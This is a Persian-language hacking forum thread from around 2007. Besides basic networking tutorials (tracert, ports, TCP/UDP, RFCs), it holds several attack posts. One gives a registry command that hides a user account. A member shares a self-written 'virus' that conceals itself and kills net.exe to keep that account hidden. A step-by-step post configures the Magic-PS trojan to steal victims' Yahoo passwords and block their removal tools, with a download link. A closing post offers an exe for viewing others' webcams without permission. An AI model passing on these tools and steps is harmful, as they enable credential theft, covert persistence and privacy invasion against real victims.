حالا ما كه تابه حال از نزديك با لينو كس كار نكرديم .چه امكاناتي داره مثل همون ويندوز خودمونه يانه .مثل ويندوز نصب ميشه .براي خودش برنامه داره .بازي هاي معمولي نصب ميشه روي اين لينوكس يانه و...
Printable View
حالا ما كه تابه حال از نزديك با لينو كس كار نكرديم .چه امكاناتي داره مثل همون ويندوز خودمونه يانه .مثل ويندوز نصب ميشه .براي خودش برنامه داره .بازي هاي معمولي نصب ميشه روي اين لينوكس يانه و...
با اجازه دوستان . دوست عزیز شما بهتره یه CD LIVE لینوکس بگیری که از نصب کردن خلاص بشی . در موردنقل قول:
امکانات هم به نظر من از نظر امنیت ویندوزو میزاره تو جیبش چون هیشکی واسش ویروس نمینویسه چون
کد باز است . در مورد بازی ها فکر کنم باید نرم افزار مربوطه رو بگیری ولی زیاد امیدوار نباش. ولی حتما
CD LIVE KNOPPIX رو بگیر اگه غلط املایی داشتم منو ببخشید. :31::10:
بهتره خودتو گرفتار لينوكس نكني من يه دفعه نصب كردم حتي با نصب مودم هم مشكل داشتم
only mac os 10
چطوری فایل موجود در مای موزیک رو به درایو دیگر انتقال بدم یا کپی کنم چون هیچ چیزی در هنگام dir کردن در مای موزیک نمایش داه نمیشه
در ضم نحوه کپی کردن فولدر (نه فایل ها) رو بگید
در ضم کپی کردن s.mp3 رو هم بگید
در هنگام نوشتن
copy s.mp3 f:
اصلا کپی نمیشه بجز در کپی کردن پسوند mp3 که همشون کپی میشن
در جواب دوستمون Samsung بايد بگم كه از پايه هست و واقعا هم همينطوره چون هكينگ يه علم هست كه 90 در صدشو خودت بايد بفهمي
دوستاني هم كه در مورد لينوكس پرسيدن لينوكس انجمن خوبي داره حتما ببيبنيد بحث در مورد لينوكس روزها وقت ميخاد!!!
ولي به هر حال جاي اين سوالات اينجا نبود
نقل قول:
اگر در هنگام dir گرفتن چيزي نميبيني از dir /aاستفاده كن
بقيه هم گفته شدن
خودتون ببینید اصلا موزیکی به این اسم دیده نمیشن حتی امس پوشه مای موزیک هم نیستنقل قول:
اگر در هنگام dir گرفتن چيزي نميبيني از dir /aاستفاده كن
بقيه هم گفته شدن
از دستور ls استفاده کن
یه دونه عکس بزارید از محل ms dosنقل قول:
از دستور ls استفاده کن
در ضم چطوری فایل mp3 رو توی کامپیوتر اجرا کنم از طریق داس
براي اجرا كردن فايل mp3 كافيه اسمشو بنويسي بعد توسط برنامه پيشفرض اجرا مانند Window Media Player اجرا ميشه
سلام
لطفا یه کتاب خوب برای اموزش C معرفی کنید. در ضمن من که با لینوکس تا حالا کار نکردم الان کدوم ورژنشو نصب کنم بهتره.
ممنون
فکر کردم درباره لینوکس صحبت می کنی تعجب کردم چرا از dir استفاده کردینقل قول:
یه دونه عکس بزارید از محل ms dos
در ضم چطوری فایل mp3 رو توی کامپیوتر اجرا کنم از طریق داس
فکر کنم مشکلت اینه که به مسیر فایل مورد نظرت نرفتی
با cd برو به مسیر فایل بعد هم راحت کپی کن و ... همه چی قبلا توضیح داده شده
نه ویندوزهنقل قول:
فکر کردم درباره لینوکس صحبت می کنی تعجب کردم چرا از dir استفاده کردی
فکر کنم مشکلت اینه که به مسیر فایل مورد نظرت نرفتی
با cd برو به مسیر فایل بعد هم راحت کپی کن و ... همه چی قبلا توضیح داده شده
می دونم ولی کپی نمیشن ارور میده
نقل قول:
همه ي اينها قبلا گفته شده
يه سرچ كوچولو
سلام، کار با Telnet رو توضیح می خواستم بدین، میشه از طریقش data گرفت؟
با سلامنقل قول:
به زودي زود
سرم خيلي شلوغه
با سلام خدمت دوستان
همونجور كه قرار شد تمامي كارها رو من تنها انجام ندم و شما هم كمك كنيد!!!
ديگه از مبحث خط فرمانها فعلا Exit ميشيم
///////////////////////////////////////
از دوستان علاقه مند و حرفه اي ميخام مبحث IP و IP Address رو شروع كنند از ابتدا و به زبان ساده
با تشكر
ذکات علم یاد دادن آن است.
بسیار بسیار از دوستان عزیز که برای پیشرفت دانش هک تلاش می کنند متشکرم.:11:
.
.
.
می خواستم ببینم که آیا :
با یوزر های غیر از ادمین میشه این ترفند
اجرای CMD از طریق Svchost.exe رو انجام داد.
من انجام دادم یه پیغام Access Denide داد.
ممنون میشم دوستان جواب بدن.
سلام صادق جان
ممنون از جملات زيبات
همونجور كه خودت فهميدي اينكار در يوزرهاي ليميت انجام نميشه فقط يه مرحله بالا بردن دسترسي در يوزر ادمين هست
واسه اجراي اون در يوزر غير ادمين راههاي بينهايت زيادي و جود داره كه بعدا شرح ميدم. يكي از اونها Local Exploit
اينهم يه مقاله خوب نوشته خودم راجع به آيپي آدرس و پينگ كه قبلا هم قولشو به خيلي ها داده بودم
اميدوارم مورد توجه قرار بگيره
انشالله مطلب بعدي در مورد Tracert خواهد بود.
رمز:کد:http://br4v3.persiangig.com/E-book/IP%20Address%20Ping.zip
کد:br4v3
من يه سري ايبوك راجبه هك داشتم اينجا بذارم بهتره
آموزش هک
کد:http://www.ebookpars.com/ebooks/AMOZESH-----.pdf
مقاله آموزشی هک و امنيت شبکهکد:http://www.ebookpars.com/ebooks/----.pdf
رودرروی انواع هکر2کد:http://www.ebookpars.com/ebooks/MAGHALE.pdf
رودرروی انواع هکر3کد:http://www.ebookpars.com/ebooks/RODAR-ROO-2.pdf
رودرروی انواع هکر4کد:http://www.ebookpars.com/ebooks/RODAR-ROO-3.pdf
کد:http://www.ebookpars.com/ebooks/RODAR-ROO-4.pdf
کد:http://www.parsinal.com/ListBySubject2.aspx?SID=28
ممنون از شما
ولي بهتر بود سر فصل هاي اونارو ميگفتيد
حداقل دوستاني كه مطالعه كردند سر فصلهارو بگن تا دوستان بدونند چي دانلود ميكنن
با تشكر
اموزش قدم به قدم هكهك چيست؟ hacker كيست؟کد:http://www.ebookpars.com/ebooks/AMOZESH-----.pdf
رودرروی انواع هکر2 و3و4 هم مربوط به رودروي هكرهاست خوندنش خالي از لطف نيستکد:http://www.ebookpars.com/ebooks/----.pdf
اين سايتاشتباه نوشتمکد:http://www.parsinal.com/ListBySubject2.aspx?SID=28
موضوع:Tracert
Trace در لغت به معني ترسيم كردن , تعقيب كردن است.
با كمك اين دستور ميتونيم مسير كامپيوترهايي(سرورهايي) رو كه بايد طي كنيم تا به يك آدرس خاص مانندبرسيم مشخص كنيم.کد:WWW.Google.Com
اين دستور در Window همان Tracert و در يونيكس Traceroute ميباشد.
مثال:ميخاهم ببينم تا موقعي كه بهميرسم بايد از چه مسير هاي عبور كنمکد:WWW.Google.com
اين دستور بصورت Tracert IP-or-Domain بكار ميرود.
---------------------
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
----------------------------
پس مينويسم--------------کد:Tracert WWW.Google.Com
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
----------------------------
ميبينيم كه بايد از 22 كامپيوتر گذشت تا به مقصد مشخص شده رسيد.
اين دستور پارامترهايي نيز دارد
d , h, w ,j
همانگونه كه در شكل ميبينيد حداكثر گامها 30 ميباشد كه با كمك سوييچ h- ميتوان اين مقدار را تغير داد براي مثال
Tracert دستوري مهم در مرحله مقدماتي نفوذ است كه براي مشخص كردن روتر ها و فايروالها در مسير مكمل خوبي با بقيه دستورات است.کد:Tracert WWW.Google.Com -h 49
By:Majeed $-2007
ُSP TANX TO P30World Member
Br4v3.0n3[at]Gmail.COM
و با تشكر از دوستان به خاطر حمايت هايشان
از دوستان اگر كسي مايله ميتونه مطلبي رو در مورد Port ها بگه
در پروتکول های TCP و UDP که برای ارتباط بین شبکه های کامپیوتری استفاده می شوند، یک Port (یا درگاه) یک عدد خاص هست که در Header یک بسته داده قرار دارد.
برای درک بهتر آن به این مثال توجه کنید: فکر کنید که IP شماره پلاک یک ساختمان است که در آن ساختمان Port نقش شماره پلاک روی هر واحدی را دارند. در صورتی که یک نامه ( یک بسته داده ) به یک ساختمان ( IP ) فرستاده شود اگه ندونیم مال کدوم واحد ( Port ) است، هیچ کس نمی فهمه این نامه ماله کی ( کدام Service ) است!
یک مثال نزدیک تر، فرض کنید سروری مسئول دریافت و فرستان ایمیل است، این Server از پورت SMTP برای فرستادن و POP3 برای دریافت نامه استفاده میکنه، اینها هرکدام بوسیله یکی از پردازشگر های سرور اداره می شوند. ضمن اینکه میشه از پورت های دیگری هم برای این کار استفاده کرد.
پورت ها معمولا در URLها هم دیده میشن، مثلا بطور قراردادی HTTP از پورت 80 و HTTPS از 443 استفاده می کند. اما مثلا در آدرس زیرفرد سعی می کنه تا با استفاده از پورت 8000 به یک سرور HTTP وصل بشه.کد:http://www.example.com:8000/blah
البته توجه داشته باشید که تمام لایه های انتقال داده از پورت استفاده نمی کنند، اگرچه TCP و UDP از پورت استفاده می کنند اما ICMP نه!
در TCP و UDP هر بسته از یک پورت مبدا و یک پورت مقصد که یک عدد 16 بیتی در رینج صفر تا 65535 است به همان صورتی که آدرس ( IP ) فرستنده و گیرنده را مشخص می کنند، استفاده می کند.
IANA مسئول ثبت پورت ها برای استفاده های خاص است. هرچند همیشه نرم افزاری را مجبور به استفاده از پورت خاصی نمی کنه، گاهی پورت ها مورد استفاده نرم افزار یا پروتوکلی می شوند که درواقع برای آن ثبت نشده اند.
پورت ها درسه دسته ی مختلف دسته بندی می شوند:
Well Known Ports که در رینج 0–1023 قرار دارند.
Registered Ports که در رینج 1024–49151 قرار دارند.
Dynamic and/or Private Ports که در رینج 49152–65535 هستند. نرم افزار ها بطور پیش فرض از این پورت ها استفاده نمی کنند.
دراین صفحه می توانید لیست مهمترین پورت هایی که استفاده می شوند را ببینید:
کد:http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
سلام به دوستان و آقا مجید (اگه اشکالی نداره) چند تا سوال برام پیش اومده من اومدم از طریق آموزش خودتون یک اکانت رو مخفی کردم همانطور که خودتون
می دونید اکانت مورد نظر از welcome screen و user account مخفی میشه و با دستور net user به راحتی میشه یوزرهای مخفی رو تشخیص داد آیا میشه کاری کرد که از داس هم نشه تشخیص داد و یه سوال دیگه برای مخفی کردن از طریق داس من این متن رو نوشتم ولی اصلا کار نمیکنه لطفا کمکم کنید.
اreg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t /v ali /t REG_DWORD /d 0
سلام بهزاد جان ببخشيد از تاخير و ممنون از سولات خوب شما
اينرو قبلا گفتم كه اين فايلها مانند دستور Finger و يا Net USer در پوشه Windows يا System32 هستند
همچنين گفتم هر چي برنامه نويسي بلد باشيد كم هست!!!!!!!
و اما
دستور NEt User به فايل Net در System32 برميگرده ما ميتونيم يه فايل به همين اسم اونجا كپي كنيم يه جورايي يه برنامه Fake كه وقتي كاربر نوشت Net User يه متن كه ما اسم يوزمون توش نباشه باز شه
اما يه مشكل اينجاست كه كرنل ويندوز هر چند لحظه يكبار فايلهاي سيستمي رو چك ميكنه كه اگر از بين رفتن اونارو Fixكنه
من يه برنامه نوشتم براي شما كه فقط براي ويندوزي كه در درايو c هست و روي ويندوز XP تست كردم و از TASK MGR هم HIDe ميشه و هر ثانيه اون فايل NEt رو Kill ميكنه(از بين ميبره)
اما همونجور كه گفتم ويندوز از حذف اون ايراد ميگيره و پنجره اي مبني بر اينكه اين فايل حذف شده مياد و درخواست Cd ويندوز XP رو ميكنه اين برنامه(يا بهتره بگم ويروس) اين پنجره رو هم ميبنده.
شما اين برنامه رو كه اسمشم همنام يه فايل سيستمي هست اجرا كن و بعد Net User رو در خط فرمان اجرا كن تا نتيجه رو ببيني مثل شكل زير
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
تست كن نظرت رو بگو تا با هم پيشرفتش بديم چون اين خيلي سادست. و اين بحث هم خيلي جالب
دانلود
رمزکد:http://br4v3.persiangig.com/Software/N3t%20Com%20Killer%20By%20Br4v3.zip
code]br4v3[/code]]
با سلام به همه ی دوستان و آقا مجید(مخصوص) آقا دستت درد نکند ولی به نظر این بنده حقیر
رو نوشتمNet user اولین چیزی که نظر منو جلب کرد این بود که وقتی تو داس دستور
یوزرها رو نشون نداد و یه ارور داد ارورش هم به عکس شما مطابقت نداشت دومین
بود Ctrl+alt+delete موردی که به آن برخورد کردم با زدن دکمه های
عدد 100 رو نوشته بود یعنی داشتperformance_cpu usage که در تب
استفاده میکرد و این میتونه برای یک مدیر شبکه و یا هرکس دیگهCpu از نهایت قدرت
TuneUp Utilities 2007_tuneup process manger شک برانگیز باشه و من با استفاده از برنامه
رو Net user کنم و بعد ازآن به داس رفتم و Kill تونستم برنامه ای که شما نوشتید پیدا کنم و
هم به حالت عادی برگشتcpu مقدار استفاده restart تایپ کردم و یوزرها رو نشون داد و بعد ازیک
من که از زبان برنامه نویسی هیچی بلد نیستم ولی بهتره یه برنامه بنویسید که یوزرهارو
هر کس رو به شک می اندازدError نشون بده ولی اون یوزر مشخص روکه ما مخفی کردیم رو نشون نده چون اون
با تشکر از شما .
سوال دوم رو هم اگه جواب دادید ممنون میشم.
ببخشید اگه درست و حسابی توضیح ندادم راستی اگه کتابی سراغ دارید که برنامه نویسی رو از آغاز شروع کنه
ممنون میشم معرفی کنید چون به برنامه نویسی بسیار علاقه دارم.ممنون
خلاصه از همه ی بچه ها میخوام که این شبه ویروس رو نصب کنند و اشکالات موجود رو ذکر کنند.
به خاطر جسارت معذرت میخام
مرسي از توجهتون
ولي دوستان هم ايده بدن من هم كمك ميكنم همه چيز رو كه قرار نيست يه نفر بگه
مرسی از بازدیدهای دوستان
لطفا یک نفر مطالب رو Pdfکنه
مطلب بعد اینکه شرمنده از تاخیرها
به درخواست دوستان حتما مطالبی در مورد برنامه نویسی هک خواهم گفت
اگر بخاید از تروجان نویسی شروع کنم تا اکسپلویت و......
Transmission Control Protocol یا همان TCP سک پروتوکل کرکزی در سری پروتوکل های اینترنت می باشد. TCP یک پورت قابل اطمینان است از این جهت که تضمین می کند تا داده های شما بدون هیچ گونه خطایی منتقل شوند و از این جهت است که می توان از آن برای نرم افزارهایی همچون انتقال فایل و ایمیل استفاده کرد!
TCP از چهار لایه تشکیل شده:
لایه اول: لایه واسطه شبکه
در این لایه استاندارد های سخت افزاری، نرم افزاری و پروتکل های شبکه تعریف شده است.
این لایه درگیر بامسائل سخت افزاری و نرم افزاری مرتبط باشبکه بوده و می تواند عناصر همگن و ناهمگن رابه هم پیوند بزند. دراین لایه تمام پروتکل های LAN, MAN قابل استفاده هستند.
=================
لایه دوم: لایه شبکه
وظیفه اصلی این لایه هدایت ازمبدا تامقصد بسته های اطلاعاتی خاص به نام IP است.
به غیر از پروتکل IP پروتکل هایی دیگری نیز هستند که وظایف مهمی رابر عهده دارند.
مهمترین آنها: ARP, BOOTP, ICMP, RIP, RARP ...
دراین لایه مسیر یاب از شرایط توپولوژیکی و ترافیکی شبکه، اطلاعات را کسب می کند تا مسیر یاب ها به روش آسان و پویا انجام دهد.
=================
لایه سوم: لایه انتقال
دراین لایه ماشین های میزبان درشبکه باهم ارتباط برقرار می کنند به عبارت دیگر یک سرویس اتصال گرا مطمئن است برای عملیاتی مانند ارسال صوت و تصویر که سرعت مهمتر ازدقت است سرویس های سریع و نامطمئن طراحی شده است. دراین سرویس لایه از رسیدن داده به مقصد اطلاع می یابد.
=================
لایه چهارم: لایه کاربرد
این لایه دارای صطح بالایی برای خلق برنامه های کاربردی ویژه و پیچیده ارائه می شود.
انتقال فایل یا FTP و شبیه سازی ترمینال و مدیریت پست و انتقال صفحات ابر متنی و ده ها پروتکل کاربردی دیگر از سطح این لایه است.
=====================================
منبع: Wikipedia و کتاب Hacker Student
سلام آقا مجید دستت درد نکند باور میکنید من هر روز به این تاپیک سر میزنم.
بازم از شما ممنون
پروتكل User Datagram Protocol يا همان UDP بسيار شبيه به پروتكل TCP است ولي بر خلاف TCP نميتواند خطاها و بسته ها را چك كند پس نسبت به TCP غير قابل اطمينان تر خواهد بود.
با استفاده از پروتكل TCP ميتوان فهميد كه Data به مقصد رسيده است يا نه ولي با UDP نميشود.
از دو پروتكل مهم TCP و UDP در هر جايي استفاده ميشود آن هم به دفعات زياد.
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
و يكي از دلايل اصلي پيدايش اين پروتكل به زبان ساده كم كردن خطاها OVER Flow است.
با تشكر از دوست و همكار خوبم كسري جان
By:Majeed $-2007
Br4v3.0n3[at]Gmail.COM
Request For Comments يا همان RFC نوشته هايي هستند كه تمامي مطالب مربوط به شبكه و اينترنت را شامل شده و منبع خوبي براي هكينگ نيز ميباشند.
اين متون يك بار منتشر شده و ديگر Edit نميشوند.
براي مثال RFC شماره 793 كه بصورت RFC793 مشخص ميشود منبع كاملي در مورد TCP ميباشد.
سايتهايي زيادي هم در مورد RFC يافت ميشود از جمله:
کد:http://rfc.net/
براي پيدا كردن RFC مورد نظر كافي است به آدرس هاي بالا رفته و شماره RFC مورد نظرمان را وارد كنيم.کد:http://www.ietf.org/rfc.htm
يا مستقيما در Google آنرا بصورت RFCnumber سرچ كنيم.مانند RFC793
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
اين هم ليست مشهورترين RFC ها در Wikipedia
اميدوارم مورد توجه قرار گرفته باشه.کد:http://en.wikipedia.org/wiki/List_of_RFCs
By:Majeed $-2007
SPEC1AL TN>< T0 P30W0RLD M3MB3R
سلام دوستان با اجازه دوستان و آقا مجید یه مطلب هم ما بزاریم خلاصه مطالب و البته کپی شده
شاید واسه دوستان جالب باشه.(آقا مجید خیلی دیر آپ میکنی)
اینم لینکش
اینم پسورد:p30worldکد:http://www.MegaShare.com/303446
دستت درد نكنه آپ كردن كه كاره يك ثانيه است.
كاره اصلي نوشتن مطالب هست كه هونجوري كه ميدوني وقت زيادي ميبره و ما هم كه سرمون شلوغ ولي نميزارم تايپيك زمبن بمونه
به هر حال متشكرم از دوستان
با يك ايميل ساده به وسيله نرم افزار Magic_ps1 پسورد افراد توي ياهو رو بزنيد
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
من به شما ميگم كه اين كارو نكنين فقط جهت يادگيري هستش
ای این تروجان میتونه پسورد یاهو مسنجر قربانیتونو از طریق یاهو مسنجر برای شما بفرسته و چون برای اینکار از خود یاهو مسنجر استفاده میکنه فایروال ها هم نمیتونن جلوشو بگیرن . این تروجان Magic-PS نام داره و ورژن اون 1.5 می باشد.
خوب حالا اگر می خواین از اون استفاده کنید برای شروع کار اونو از اینجا د انلود کنید و پس از دانلود همه مراحل و تنطیمات زیر را به دقت دنبال کنید...:
ابتدا فایل دانلود شده را از حالت فشرده خارج کنید سپس به پوشه ای که فایل را درون اون باز کردید بروید و فایل Magic_PS_15.exe را اجرا کنید .
برنامه زیر برروی صفحه نمایش داده میشود . سپس هر کدام از قسمت ها را طبق نظر خودتون و با کمک از توضیحات زیر تنظیم کنید
( Victim )در این قسمت شما می تونین تنظیمات زیر را انجام بدید :
Send Y! Mess Pass : با انتخاب این قسمت هر بار که قربانیتون پسورد خودش را در یاهو مسنجر وارد کنه این پسورد برای شما فرستاده میشه.
Send IP : اگر این قسمت را انتخاب کنید IP قربانی نیز براتون فرستاده میشه .
Disable taskmgr xp-2k : با انتخاب این گزینه قربانی نمیتونه با استفاده از Task Manager که با زدن کلید های Ctrl+Alt+Del باز میشه سرور تروجان را از کار بندازه.
Disable Y! save pass : این گزینه باعث میشه که قربانی نتونه پسوردش را تو یاهو مسنجر ذحیره کنه.
Disable Mess Archive : این یکی یکی از بر تریهاش نسبت به ورژن های قبلیشه که باعث میشه ID شما داخل Message Archive قربانی ذخیره نشه.
Send OS Name : این نوع سیستم عامل قربانی را براتون میفرسته.
Auto Startup : هر وقت ویندوز روشن میشه سرور شما را فعال میکنه.( باید همیشه فعال باشه )
Disable RegEdit : اینم از وارد شدن قربانی به ریجستری برای از کار انداختن سرور جلوگیری میکنه .
Disable MsConfig : این از وارد شدن قربانی به System Configuration Utility برای از کار انداختن سرور جلوگیری میکنه .
Melt After Install :
FileName after instal : اینجا نامی را انتخاب میکنید که سرور بعد از اجرا در سیستم قربانی خودش را در پوشه ویندوز با اون ذخیره میکنه
Fake Error Message : اگر اینو انتخاب کنید بهد از اجرا سرور یک پیغام خطا نشون داده میشه.
Caption : عنوان خطایی که نشان داده میشه.
Message : متن خطایی که نشون داده میشه.
Test : پیغام خطا را به شما نشون میده.
( Your Yahoo! ID that logged pass send to it )
Y! ID : در این قسمت باید ID یاهوتون را وارد کنید.
( Choose Icon )
No Icon : سرورتون هیج ایکنی نخواهد داشت.
JPG Icon : سرورتون با آیکن عکس ذخیره میشه.
Software Icon : سرورتون با آیکن Setup ذخیره میشه.
توجه : این قسمت فقط بروی فایل های با پسوند exe و scr تاثیر دارد.
Binder : با انتخاب این گزینه میتونین یک فایل به سرورتون بچسبونین که همراه باسرور اجرا بشه. ( مثلا یک عکس )
Extract to : محل باز شدن فایل چسبانده شده را نشان میده.
Run : روش باز شدن فایل چسبانده شده را نشان میده.
( MPS Creator )
File Name : در این قسمت میتونین نام سرور خودتون را انتخاب یا برای اون نامی بنویسید.
Crate MPS : سرور شما را در پوشه برنامه ذخیره میکنه.
About : اطلاعاتی در باره نویسنده این برنامه و خود برنامه به شما میده.
Exit : شما را از برنامه خارج میکنه.
توجه: در انتهای نام فایل حتما باید ( exe. یا scr یا bat. یا pif. ) وجود داشته باشه.
اينم لينك دانلود ببخشيد كه توي 2 پست شد اخه گير اوردن لينكش سخت بودکد:http://www.sharemation.com/Mozahem/Magic/Magic_PS1.5.zip
۱۱۰آيا شما دوست داريد که وبکم رو بدون اجازه ببينيد ؟۱۱۰
سلام به همه کسانی که حيلی دلشون ميخواد که به وبکم ديگرون نگاه کنن ولی اجازه اين کار رو ندارن ناراحت نباشيد من اين برنامه رو به شما معرفی ميکنم که بدون گرفتن اجازه شما ميتونيد به وبکم ديگران نگاه کنيد ابتدا شما اين برنامه رو اينجا دانلود کنيد. طرز کارش به اين صورت است که شما آی دی رو مينويسيد بعد connect رو بزنين همين
در ضمن اگر خواستيد از اين جور برنامه ها رو از اين به بعد به شما معرفی کنم پيغام بزاريد لطفا
خب ديگه برين حال كنينکد:http://home.ripway.com/2004-1/53520/yaCam2.exe